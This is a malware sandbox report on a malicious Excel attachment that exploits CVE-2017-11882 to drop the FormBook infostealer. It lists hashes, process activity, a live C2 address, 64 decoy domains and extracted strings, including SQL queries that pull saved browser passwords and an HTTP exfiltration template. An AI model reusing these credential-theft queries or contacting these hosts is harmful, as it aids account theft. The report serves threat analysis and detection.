Malware analysis 九月声明 40981675.xls Malicious activity

Add for printing

File name:	九月声明 40981675.xls
Full analysis:	https://app.any.run/tasks/12a00a62-2df1-43ce-9b9a-a29b18bbaca9
Verdict:	Malicious activity
Threats:	FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Malware Trends Tracker >>>
Analysis date:	October 18, 2023, 16:13:35
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:	opendir exploit cve-2017-11882 loader formbook xloader
Indicators:
MIME:	application/vnd.ms-excel
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 17 16:56:09 2023, Security: 0
MD5:	BEBDE97040EEECB866DB4F6EFF2A0F3C
SHA1:	EEF9D50A9EE55ACC5C4C389D5A0F3105A14CCF96
SHA256:	95F512905D4B5EBE18EC19E3A3B2DFFBD727E91FDC0177667512B44FC7F5D857
SSDEEP:	49152:aTlbNqjBHZdFtSgJLP6J5sAT1vNyUOF+4u31a0mF9EdFi3LaCDNzYsAW5sAT1vNZ:exqJXSgJLP67sAkFkWLZDR1JsA+FVWL3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.18860 KB4052978
Adobe Acrobat Reader DC MUI (15.007.20033)
Adobe Flash Player 27 ActiveX (27.0.0.187)
Adobe Flash Player 27 NPAPI (27.0.0.187)
Adobe Flash Player 27 PPAPI (27.0.0.187)
CCleaner (5.35)
Google Chrome (109.0.5414.120)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (64-bit) (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.1 (4.7.02558)
Microsoft .NET Framework 4.7.1 (4.7.02558)
Microsoft Edge (109.0.1518.115)
Microsoft Edge Update (1.3.177.11)
Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.4763.1000)
Microsoft Office Proof (French) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Single Image 2010 (14.0.4763.1000)
Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (115.0.2)
Mozilla Maintenance Service (115.0.2)
Notepad++ (64-bit x64) (7.5.1)
PowerShell 7-x64 (7.2.11.0)
Skype version 8.100 (8.100)
Update for Microsoft .NET Framework 4.7.1 (KB4054852) (1)
VLC media player (2.2.6)
WinRAR 5.60 (64-bit) (5.60.0)

Add for printing

MALICIOUS
- Suspicious connection from the Equation Editor
  - EQNEDT32.EXE (PID: 2508)
- Equation Editor starts application (CVE-2017-11882)
  - EQNEDT32.EXE (PID: 2508)
- Application was dropped or rewritten from another process
  - audiodgse.exe (PID: 848)
  - audiodgse.exe (PID: 2844)
- Drops the executable file immediately after the start
  - EQNEDT32.EXE (PID: 2508)
- FORMBOOK has been detected (YARA)
  - msdt.exe (PID: 1696)
SUSPICIOUS
- Reads the Internet Settings
  - EQNEDT32.EXE (PID: 2508)
- Connects to the server without a host name
  - EQNEDT32.EXE (PID: 2508)
- Process requests binary or script from the Internet
  - EQNEDT32.EXE (PID: 2508)
- Application launched itself
  - audiodgse.exe (PID: 848)
- Starts CMD.EXE for commands execution
  - msdt.exe (PID: 1696)
INFO
- Reads the machine GUID from the registry
  - EQNEDT32.EXE (PID: 2508)
  - audiodgse.exe (PID: 848)
- Reads the computer name
  - EQNEDT32.EXE (PID: 2508)
  - audiodgse.exe (PID: 848)
  - audiodgse.exe (PID: 2844)
- Checks supported languages
  - EQNEDT32.EXE (PID: 2508)
  - audiodgse.exe (PID: 848)
  - audiodgse.exe (PID: 2844)
- Checks proxy server information
  - EQNEDT32.EXE (PID: 2508)
- Creates files or folders in the user directory
  - EQNEDT32.EXE (PID: 2508)
- Manual execution by a user
  - autochk.exe (PID: 312)
  - autochk.exe (PID: 2420)
  - autochk.exe (PID: 2228)
  - autochk.exe (PID: 2472)
  - autochk.exe (PID: 2952)
  - autochk.exe (PID: 2800)
  - msdt.exe (PID: 1696)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

Formbook

(PID) Process(1696) msdt.exe

C2www.nightoracle.com/rs10/

Strings (79)USERNAME

LOCALAPPDATA

USERPROFILE

APPDATA

TEMP

ProgramFiles

CommonProgramFiles

ALLUSERSPROFILE

/c copy "

/c del "

\Run

\Policies

\Explorer

\Registry\User

\Registry\Machine

\SOFTWARE\Microsoft\Windows\CurrentVersion

Office\15.0\Outlook\Profiles\Outlook\

NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

\SOFTWARE\Mozilla\Mozilla

\Mozilla

Username:

Password:

formSubmitURL

usernameField

encryptedUsername

encryptedPassword

\logins.json

\signons.sqlite

\Microsoft\Vault\

SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins

\Google\Chrome\User Data\Default\Login Data

SELECT origin_url, username_value, password_value FROM logins

.exe

.com

.scr

.pif

.cmd

.bat

win

gdi

mfc

vga

igfx

user

help

config

update

regsvc

chkdsk

systray

audiodg

certmgr

autochk

taskhost

colorcpl

services

IconCache

ThumbCache

SeDebugPrivilege

SeShutdownPrivilege

\BaseNamedObjects

config.php

POST

HTTP/1.1

Host:

Connection: close

Content-Length:

Cache-Control: no-cache

Origin: http://

User-Agent: Mozilla Firefox/4.0

Content-Type: application/x-www-form-urlencoded

Accept: */*

Referer: http://

Accept-Language: en-US

Accept-Encoding: gzip, deflate dat=

f-start

f-end

Decoy C2 (64)starryallure.com

mania-31.online

baba-bt-top1.buzz

jwilkinsartscapeinc.com

tallerhazop.com

lulu013.com

pontoimediato.com

stmc-company.com

thesoftwarepractitioner.com

makemoneywithsherrie.com

algaroba.com

smartbookmarks.info

burneysaw.com

fftsxxx.top

hvr998.com

sofisticars.store

clickit.fun

couches-sofas-16683.bond

ikkasolutions.com

oakvisa.com

totalkfood.com

guillaumecarreau.com

biomagnetismocolombia.com

jrszhiboz.com

rewmio.xyz

willowliy.com

calm-plants.com

robertjamesfineclothing.com

wgardsgm.live

dngbdk9jpusxpwr.com

slycepicklegear.com

mtauratarnt.com

simolified.com

mekkamochi.com

deeprootedleader.com

container-houses-vn.click

roundaboutlogistics.com

m-baer.com

electric-cars-19095.bond

destinydinos.com

taxretentionstrategiesgroup.com

zg9tywlubmftzw5ldzi0mdm.com

cleaning-products-29334.bond

metaastrologia.com

practicaloutsource.com

w1nb74.top

just-one.info

cryptarrow.com

omarshafie.online

latitudeinformatics.com

fhstbanknigeria.com

hdlive7.live

laserhairremovalkit.com

into-org.com

kzjsm.com

juara102-azura.com

digitsum.com

cabins-prefab.online

allisonparlinart.com

cpsgrantstream.com

everythingbutthetruck.com

w6k3v.com

alfarizkigrup.com

gs3ekdj3ixe.asia

No Malware configuration.

Add for printing

TRiD

.xls	\|	Microsoft Excel sheet (31.2)
.xls	\|	Microsoft Excel sheet (alternate) (25.5)

EXIF

FlashPix

Author:	-
LastModifiedBy:	-
Software:	Microsoft Excel
CreateDate:	2006:09:16 00:00:00
ModifyDate:	2023:10:17 15:56:09
Security:	None
CodePage:	Windows Latin 1 (Western European)
AppVersion:	12
ScaleCrop:	No
LinksUpToDate:	No
SharedDoc:	No
HyperlinksChanged:	No
TitleOfParts:	Sheet1 Sheet2 Sheet3
HeadingPairs:	Worksheets 3
CompObjUserTypeLen:	38
CompObjUserType:	Microsoft Office Excel 2003 Worksheet

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

312

"C:\Windows\SysWOW64\autochk.exe"

C:\Windows\SysWOW64\autochk.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Auto Check Utility

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\autochk.exe
c:\windows\syswow64\ntdll.dll
c:\windows\system32\ntdll.dll

848

"C:\Users\admin\AppData\Roaming\audiodgse.exe"

C:\Users\admin\AppData\Roaming\audiodgse.exe

—

EQNEDT32.EXE

User:

admin

Integrity Level:

MEDIUM

Description:

TriviaNow

Exit code:

Version:

1.0.0.0

Modules

Images
c:\users\admin\appdata\roaming\audiodgse.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

1492

"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft Excel

Exit code:

Version:

14.0.4756.1000

Modules

Images
c:\windows\system32\ntdll.dll
c:\program files\microsoft office\office14\excel.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll

1512

/c del "C:\Users\admin\AppData\Roaming\audiodgse.exe"

C:\Windows\SysWOW64\cmd.exe

—

msdt.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

1696

"C:\Windows\SysWOW64\msdt.exe"

C:\Windows\SysWOW64\msdt.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Diagnostics Troubleshooting Wizard

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\msdt.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

Formbook

(PID) Process(1696) msdt.exe

C2www.nightoracle.com/rs10/

Strings (79)USERNAME

LOCALAPPDATA

USERPROFILE

APPDATA

TEMP

ProgramFiles

CommonProgramFiles

ALLUSERSPROFILE

/c copy "

/c del "

\Run

\Policies

\Explorer

\Registry\User

\Registry\Machine

\SOFTWARE\Microsoft\Windows\CurrentVersion

Office\15.0\Outlook\Profiles\Outlook\

NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

\SOFTWARE\Mozilla\Mozilla

\Mozilla

Username:

Password:

formSubmitURL

usernameField

encryptedUsername

encryptedPassword

\logins.json

\signons.sqlite

\Microsoft\Vault\

SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins

\Google\Chrome\User Data\Default\Login Data

SELECT origin_url, username_value, password_value FROM logins

.exe

.com

.scr

.pif

.cmd

.bat

win

gdi

mfc

vga

igfx

user

help

config

update

regsvc

chkdsk

systray

audiodg

certmgr

autochk

taskhost

colorcpl

services

IconCache

ThumbCache

SeDebugPrivilege

SeShutdownPrivilege

\BaseNamedObjects

config.php

POST

HTTP/1.1

Host:

Connection: close

Content-Length:

Cache-Control: no-cache

Origin: http://

User-Agent: Mozilla Firefox/4.0

Content-Type: application/x-www-form-urlencoded

Accept: */*

Referer: http://

Accept-Language: en-US

Accept-Encoding: gzip, deflate dat=

f-start

f-end

Decoy C2 (64)starryallure.com

mania-31.online

baba-bt-top1.buzz

jwilkinsartscapeinc.com

tallerhazop.com

lulu013.com

pontoimediato.com

stmc-company.com

thesoftwarepractitioner.com

makemoneywithsherrie.com

algaroba.com

smartbookmarks.info

burneysaw.com

fftsxxx.top

hvr998.com

sofisticars.store

clickit.fun

couches-sofas-16683.bond

ikkasolutions.com

oakvisa.com

totalkfood.com

guillaumecarreau.com

biomagnetismocolombia.com

jrszhiboz.com

rewmio.xyz

willowliy.com

calm-plants.com

robertjamesfineclothing.com

wgardsgm.live

dngbdk9jpusxpwr.com

slycepicklegear.com

mtauratarnt.com

simolified.com

mekkamochi.com

deeprootedleader.com

container-houses-vn.click

roundaboutlogistics.com

m-baer.com

electric-cars-19095.bond

destinydinos.com

taxretentionstrategiesgroup.com

zg9tywlubmftzw5ldzi0mdm.com

cleaning-products-29334.bond

metaastrologia.com

practicaloutsource.com

w1nb74.top

just-one.info

cryptarrow.com

omarshafie.online

latitudeinformatics.com

fhstbanknigeria.com

hdlive7.live

laserhairremovalkit.com

into-org.com

kzjsm.com

juara102-azura.com

digitsum.com

cabins-prefab.online

allisonparlinart.com

cpsgrantstream.com

everythingbutthetruck.com

w6k3v.com

alfarizkigrup.com

gs3ekdj3ixe.asia

2228

"C:\Windows\SysWOW64\autochk.exe"

C:\Windows\SysWOW64\autochk.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Auto Check Utility

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\ntdll.dll
c:\windows\system32\ntdll.dll
c:\windows\syswow64\autochk.exe

2420

"C:\Windows\SysWOW64\autochk.exe"

C:\Windows\SysWOW64\autochk.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Auto Check Utility

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\autochk.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll

2472

"C:\Windows\SysWOW64\autochk.exe"

C:\Windows\SysWOW64\autochk.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Auto Check Utility

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\autochk.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll

2508

"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

svchost.exe

User:

admin

Company:

Design Science, Inc.

Integrity Level:

MEDIUM

Description:

Microsoft Equation Editor

Exit code:

Version:

00110900

Modules

Images
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\ntdll.dll
c:\windows\syswow64\kernelbase.dll

2800

"C:\Windows\SysWOW64\autochk.exe"

C:\Windows\SysWOW64\autochk.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Auto Check Utility

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\autochk.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll

Add for printing

Total events

2 262

Read events

2 213

Write events

Delete events

Modification events


